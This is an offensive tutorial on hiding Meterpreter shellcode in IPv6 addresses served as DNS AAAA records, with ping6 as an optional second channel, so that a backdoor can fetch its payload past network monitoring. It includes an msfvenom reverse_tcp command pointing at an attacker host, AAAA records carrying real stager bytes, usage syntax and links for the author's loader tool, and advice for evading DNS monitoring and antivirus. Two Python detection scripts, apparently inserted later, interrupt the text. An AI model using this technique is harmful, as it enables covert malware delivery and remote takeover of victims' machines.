Transferring Backdoor Payloads by DNS AAAA records and IPv6 Address


In this article I want to explain how IPv6 address (AAAA) records in DNS traffic can be used for transferring payloads. In my previous article I explained how DNS PTR records can be used; now we should talk about AAAA records.

This article has two parts:

  • PART I : DNS AAAA records and ICMPv6
  • PART II : DNS and AAAA records (large DNS AAAA records Response)

PART I: DNS AAAA records and ICMPv6

IPv6 addresses are a really good thing for transferring payloads; let me explain how this can be done, very simply.

For example, we have one IPv6 address like this:

fe80:1111:0034:abcd:ef00:ab11:ccf1:0000

In this case we can use the “xxxx” sections of the IPv6 address for our payloads:

fe80:1111:xxxx:xxxx:xxxx:xxxx:xxxx:wxyz

I think we have two ways of using such IPv6 addresses for our payloads: first, DNS AAAA records alone; second, DNS AAAA records combined with ICMPv6 traffic by ping6.

ICMPv6 and ping6: in this case you change the attacker's IPv6 address to a fake IPv6 address carrying the injected payload; the backdoor system then obtains these IPv6 addresses in a ping6 loop (ICMPv6 traffic).

So we have something like this:

(backdoor system) ipaddress = {192.168.1.120}

(attacker system) ipaddress = {192.168.1.111 ,fe80:1111:0034:abcd:ef00:ab11:ccf1:0000}

(attacker system) DNS name = test.domain.com, with a DNS service installed {dnsmasq or dnsspoof}

DNS AAAA records and ICMPv6, step by step:

step1: (attacker DNS server) record0 => fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 AAAA test.domain.com

step2: (backdoor system) ==> nslookup test.server.com 192.168.1.111

step3: (backdoor system) loop ping6 => (attacker system fe80:1111:0034:abcd:ef00:ab11:ccf1:0000)

step4: (backdoor system) dump the injected payload from the IPv6 address in the ping6 response, i.e. these sections {0034:abcd:ef00:ab11:ccf1}

step5: (attacker DNS server) record0 changes to a new AAAA for test.domain.com

step6: (attacker DNS server) record0 => fe80:1111:cf89:abff:000e:09b1:33b1:0001 AAAA test.domain.com

step6-1: (attacker system) add or change the NIC IPv6 address by ifconfig eth0 { new IPv6 address: fe80:1111:cf89:abff:000e:09b1:33b1:0001 }

step6-2: ping6 response for step 3 = timeout or unreachable (error); this is the flag for getting the new IPv6 address, or probably your traffic was detected by something and blocked.

step7: (backdoor system) => nslookup test.server.com 192.168.1.111

step8: (backdoor system) loop ping6 test.domain.com => {new IPv6 address fe80:1111:cf89:abff:000e:09b1:33b1:0001}

step9: (backdoor system) dump the injected payload from the new IPv6 address in the ping6 response, i.e. these sections: {cf89:abff:000e:09b1:33b1}

Note 1: when do we know the IPv6 address has changed? When the ping6 response from the attacker system is a timeout or unreachable … you can also check this by nslookup.

Note 2: you can also assign multiple IPv6 addresses to the attacker NIC; in that case step “6-1” is not needed, but you also can't use the flag from “Note 1”, so in this case the backdoor system should use a timer or a loop to get each new IPv6 address from the attacker system by nslookup or a similar tool. In other words, from the backdoor system you can get the attacker system's IPv6 addresses line by line with nslookup, using the DNS round-robin feature and chunking the payload across IPv6 addresses and DNS names.

After these steps you have a 20-byte payload, transferred by DNS and ICMPv6 traffic, like this:

payload0= fe80:1111:0034:abcd:ef00:ab11:ccf1:0000 ==> 0034:abcd:ef00:ab11:ccf1

payload1= fe80:1111:cf89:abff:000e:09b1:33b1:0001 ==> cf89:abff:000e:09b1:33b1

So we have this payload after two ping6 rounds:

response:0034abcdef00ab11ccf1cf89abff000e09b133b1

But with this technique you can also do it by DNS traffic only, which means you can remove all the ping6 steps: the payload can be dumped from the DNS response alone, in step 2 and step 7, if you want to do this without ping6 and ICMPv6 traffic. We talk about that in PART II (DNS and AAAA records).

Let me show you some pictures of the ICMPv6 method, without code or tools.

I will publish C# code for this one in the future, and maybe a step-by-step article too, but for now I want to show you some pictures of the DNS AAAA + ICMPv6 technique.

Picture: A

In picture A you can see we have 8 AAAA records for the DNS name test.domain.com, and you can also see the ping response for these IPv6 addresses. In this DNS + ICMPv6 technique you can download the DNS names with 1 or 2 requests and then use ping6 for these IPv6 addresses if you want to use ICMPv6.

In picture A we have 8 AAAA records, so we have 8 * 10 bytes = 80 bytes of Meterpreter payload!

fe80:1111:fc48:83e4:f0e8:cc00:0000:ae0 test.domain.com

fe80:1111:4151:4150:5251:5648:31d2:ae1 test.domain.com

fe80:1111:6548:8b52:6048:8b52:1848:ae2 test.domain.com

fe80:1111:8b52:2048:8b72:5048:0fb7:ae3 test.domain.com

fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 test.domain.com

fe80:1111:617c:022c:2041:c1c9:0d41:ae5 test.domain.com

fe80:1111:01c1:e2ed:5241:5148:8b52:ae6 test.domain.com

fe80:1111:208b:423c:4801:d066:8178:ae7 test.domain.com

PAYLOAD0= fc4883e4f0e8cc000000 and Counter = ae0

PAYLOAD1= 415141505251564831d2 and Counter = ae1

So we have this payload = fc4883e4f0e8cc000000415141505251564831d2

Why ping, when we can get payloads by DNS request?

If you use a DNS request loop, or DNS requests with a large response of many AAAA records, that is probably a flag for detection by DNS monitoring tools. But if you have 1 or 2 ping6 for the AAAA records after each DNS AAAA response, then I think it looks like normal traffic and the risk of detection by DNS monitoring devices or tools is very low.

For example, you can use one request with one response carrying only 1, 2 or 3 AAAA records. That means if your response had 4 or more AAAA records, then network monitoring devices/tools may detect your traffic; but SOC/NOC people can talk about these restriction rules in networks better than me.

As you can see in picture A, my request for test.domain.com had 8 AAAA records in the response.

So in this case you should chunk your payloads across IPv6 addresses and also across DNS names.
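From the defender's side, the thresholds discussed here (a response with four or more AAAA records, a long response) can be turned into detection logic over resolver logs. The following Python is an added example, not code from this article or from the NativePayload tools. The log line format, the client/qname fields and the 1000-byte size threshold are assumptions, and the sample log lines are constructed (they reuse the article's own addresses for test.domain.com). It also adds two checks the article only implies: AAAA answers inside fe80::/10, which a public name should never resolve to, and a shared prefix with a counter stepping up in the last hextet.

```python
import ipaddress
import re
from collections import defaultdict

# Thresholds. MAX_ANSWERS follows the article's remark that a response with four or
# more AAAA records is likely to be noticed; LARGE_RESPONSE (bytes) is an assumed
# value chosen between the two response sizes the article reports, 132 and 1503.
MAX_ANSWERS = 4
LARGE_RESPONSE = 1000
LINK_LOCAL = ipaddress.IPv6Network("fe80::/10")  # never a legitimate AAAA answer for a public name

# Assumed log line format (one line per AAAA answer); adjust the pattern to your resolver.
LINE_RE = re.compile(
    r"client=(?P<client>\S+)\s+qname=(?P<qname>\S+)\s+type=AAAA\s+"
    r"answer=(?P<answer>\S+)\s+rlen=(?P<rlen>\d+)"
)

# Constructed sample log. The first group reuses four of the article's picture-A
# addresses for test.domain.com; the second is a small two-record chunk; the
# third is an ordinary dual-stack host that should not be flagged.
SAMPLE_LOG = """\
10:00:01 client=192.168.1.120 qname=test.domain.com type=AAAA answer=fe80:1111:fc48:83e4:f0e8:cc00:0000:ae0 rlen=1503
10:00:01 client=192.168.1.120 qname=test.domain.com type=AAAA answer=fe80:1111:4151:4150:5251:5648:31d2:ae1 rlen=1503
10:00:01 client=192.168.1.120 qname=test.domain.com type=AAAA answer=fe80:1111:6548:8b52:6048:8b52:1848:ae2 rlen=1503
10:00:01 client=192.168.1.120 qname=test.domain.com type=AAAA answer=fe80:1111:8b52:2048:8b72:5048:0fb7:ae3 rlen=1503
10:00:05 client=192.168.1.120 qname=test0.domain.com type=AAAA answer=fe80:1111:4a4a:4d31:c948:31c0:ac3c:ae4 rlen=132
10:00:05 client=192.168.1.120 qname=test0.domain.com type=AAAA answer=fe80:1111:617c:022c:2041:c1c9:0d41:ae5 rlen=132
10:00:09 client=192.168.1.121 qname=www.example.net type=AAAA answer=2001:db8::1 rlen=86
"""


def parse_log(text):
    """Group AAAA answers by (client, qname); keeps the largest response length seen."""
    groups = defaultdict(lambda: {"answers": [], "rlen": 0})
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        g = groups[(m["client"], m["qname"])]
        g["answers"].append(ipaddress.IPv6Address(m["answer"]))
        g["rlen"] = max(g["rlen"], int(m["rlen"]))
    return groups


def sequential_counter(addrs):
    """True when all answers share their first 32 bits and the last hextets count up
    by one: the shape of a payload carrier with a per-record counter."""
    if len(addrs) < 2:
        return False
    prefixes = {int(a) >> 96 for a in addrs}
    last = sorted(int(a) & 0xFFFF for a in addrs)
    return len(prefixes) == 1 and all(b - a == 1 for a, b in zip(last, last[1:]))


def findings_for(group):
    """Return the list of heuristics a query group trips, in a fixed order."""
    addrs, reasons = group["answers"], []
    if len(addrs) >= MAX_ANSWERS:
        reasons.append("many_aaaa_answers")
    if group["rlen"] >= LARGE_RESPONSE:
        reasons.append("large_response")
    if any(a in LINK_LOCAL for a in addrs):
        reasons.append("link_local_answer")
    if sequential_counter(addrs):
        reasons.append("sequential_counter_hextet")
    return reasons


def analyze(text):
    """Map each flagged query name to its reasons; clean groups are omitted."""
    out = {}
    for (_client, qname), group in parse_log(text).items():
        reasons = findings_for(group)
        if reasons:
            out[qname] = reasons
    return out


if __name__ == "__main__":
    for qname, reasons in analyze(SAMPLE_LOG).items():
        print(f"{qname}: {', '.join(reasons)}")
```

Run stand-alone, it prints each query name that tripped a heuristic together with the reasons. The two-record test0.domain.com group shows why the record-count threshold alone is not enough: it passes the count and size checks and is only caught by the link-local and counter checks, which is exactly the chunked pattern the article recommends.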

Let me explain something about ICMPv6: if you want to ping a system by IPv6 address, first you need the IPv6 address of that system, so you always need a DNS request. The important point is how many DNS requests you need for dumping all the IPv6 addresses, and so the Meterpreter payload injected into them.

One request?

If you want to get all IPv6 addresses with one request and one response, then you will have one response with too many AAAA records, so the risk of detection is high, as in picture A1:

Picture A1:

In the next picture, A2, you can see the lengths of 2 requests: first a small response, second a large response.

Picture A2: as you can see in picture A2 we have two DNS AAAA responses; the first had length 132 (small response) and the second had length 1503 (large response).

In this article I will explain one request and one response for dumping all IPv6 addresses by DNS AAAA records, like the second response in picture A2. But here we are talking about the DNS + ICMPv6 method and also about the risk of detecting a large DNS AAAA response: as you can see in picture A2, the second response has a large length, and with this length the risk of detection by DNS monitoring tools is high.
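The two response lengths in picture A2 can be reproduced from the DNS wire format, which is useful when sizing a response-length rule. The following Python is an added example, not part of the article: it builds a minimal AAAA response with one question and compressed answer names, and adds the 14 + 20 + 8 bytes of Ethernet, IPv4 and UDP headers that a capture tool counts in a frame length. Those framing assumptions, the absence of an EDNS OPT record, and the assumption that the large response carried the 51 records of the Part II hosts file are mine; under them, 2 records for test0.domain.com give 132 bytes and 51 records for test.domain.com give 1503 bytes, matching the picture.

```python
import ipaddress
import struct

# Header bytes that a packet capture adds to the DNS message: Ethernet (14),
# IPv4 (20) and UDP (8). Assumption: IPv4 transport with no IP options.
FRAME_OVERHEAD = 14 + 20 + 8
QTYPE_AAAA, QCLASS_IN = 28, 1


def encode_name(name):
    """Encode a domain name in DNS label form: length byte + label, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_aaaa_response(name, addresses, txid=0x1234, ttl=60):
    """Minimal DNS response: header, one AAAA question, one AAAA RR per address.
    Each answer name is a compression pointer (0xC00C) to the question name at
    offset 12, as real resolvers emit; no EDNS OPT record is appended."""
    flags = 0x8180  # QR=1, Opcode=0, RD=1, RA=1, RCODE=0
    header = struct.pack("!HHHHHH", txid, flags, 1, len(addresses), 0, 0)
    question = encode_name(name) + struct.pack("!HH", QTYPE_AAAA, QCLASS_IN)
    answers = b""
    for addr in addresses:
        rdata = ipaddress.IPv6Address(addr).packed
        answers += b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_AAAA, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answers


def dns_message_len(name, n_answers):
    """UDP payload size of a response to `name` carrying n_answers AAAA records
    (constructed placeholder addresses; only the count matters for the size)."""
    placeholders = [f"2001:db8::{i + 1:x}" for i in range(n_answers)]
    return len(build_aaaa_response(name, placeholders))


def frame_len(name, n_answers):
    """Frame length as a capture tool would display it."""
    return FRAME_OVERHEAD + dns_message_len(name, n_answers)


def max_aaaa_answers_under(name, message_limit=512):
    """Largest number of AAAA answers whose response stays within message_limit
    bytes (512 is the classic RFC 1035 UDP limit without EDNS0)."""
    n = 0
    while dns_message_len(name, n + 1) <= message_limit:
        n += 1
    return n


if __name__ == "__main__":
    for qname, n in (("test0.domain.com", 2), ("test.domain.com", 51)):
        print(f"{qname}: {n} AAAA records -> {dns_message_len(qname, n)}-byte message, "
              f"{frame_len(qname, n)}-byte frame")
    print("records that fit a 512-byte message for test.domain.com:",
          max_aaaa_answers_under("test.domain.com"))
```

Every compressed AAAA answer costs 28 bytes, so the message grows linearly with the record count, and the 1461-byte DNS message behind the 1503-byte frame is far above the classic 512-byte UDP limit of RFC 1035. max_aaaa_answers_under shows that only 17 such records fit under that limit for this name, so a single-response transfer of this size needs EDNS0 or TCP fallback, which is itself a property a monitor can key on.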

Two requests, or more than two requests?

As you can see in picture B, my payloads are in 3 DNS names {test0.domain.com, test1.domain.com, test2.domain.com}

and I ran ping6 one time for each IPv6 address with “100% ping reply”.

So in this example we have 3 requests and 3 responses with two AAAA records in each response; we also have ICMPv6 traffic after each DNS AAAA response, and finally the DNS responses have a small length too.

Picture B:

Note: I had multiple IPv6 addresses on my Linux system for the ping6 replies, like picture C.

You can do “STEP 6-1” by ifconfig or by assigning multiple IPv6 addresses to the NIC, like picture C.

Picture C:

And these are our DNS queries, like picture C1:

Picture C1:

Now in picture D you can see another example of chunking requests and responses.

Picture D:

You can also see in picture E our DNS server log for the DNS requests and responses.

Picture E:

Anyway, as you can see from the pictures this method is technically possible, and in the future I want to make C# source code for it.

PART II: DNS and AAAA records (large DNS AAAA records Response)

Now I want to talk about DNS and AAAA records, and about how these payloads can be fetched with one DNS request and one DNS response from a fake DNS server to the backdoor system. So we are talking about a large AAAA response: after one DNS response you have the whole payload on the backdoor system, and thus a Meterpreter session by one DNS AAAA response.

Step by step: transferring backdoor payloads with DNS AAAA records by the NativePayload_IP6DNS tool:

step1: making a fake DNS server with a hosts file.

In this case, for the attacker system, I want to use the dnsmasq tool and the dnsmasq.hosts file.

Before making this file you need a payload; with this command you can generate one:

msfvenom --arch x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 -f c > /payload.txt

Note: in this case 192.168.1.50 was the attacker's fake DNS server and the attacker's Metasploit listener too.

Now you should make the hosts file from this payload string, like picture 1; you can make it with this syntax:

syntax1: NativePayload_IP6DNS.exe null 0034abcdef00ab11ccf1cf89abff000e09b133b1…

Picture 1:

Now copy these IPv6 addresses to the DNS hosts file like picture 2; you need a DNS name after each IPv6 address line, please see picture 2.

Picture 2:

In this case I want to use the dnsmasq tool as the DNS server, so you can use the /etc/hosts file or /etc/dnsmasq.hosts; it depends on your dnsmasq configuration.

So, like picture 3, you can start your DNS server with this command.

Picture 3:

After starting the DNS server, your dnsmasq should read at least 51 addresses from the hosts file.

Finally, with this syntax you will have a Meterpreter session by one DNS IPv6 AAAA records response (one large response like picture A2, the second DNS response with length 1503).

Syntax: NativePayload_IP6DNS.exe “FQDN” “Fake DNS Server”

Syntax: NativePayload_IP6DNS.exe test.domain.com 192.168.1.50

Picture 4:

At a glance: DNS traffic, PTR records and especially IPv6 AAAA records are really good for transferring your payload to bypass network monitoring or the like, and with these techniques anti-viruses were bypassed too.

C# source code for the NativePayload_IP6DNS.exe tool (DNS AAAA records):

https://github.com/DamonMohammadbagher/NativePayload_IP6DNS

C# source code for the NativePayload_DNS.exe tool (DNS PTR records):

https://github.com/DamonMohammadbagher/NativePayload_DNS
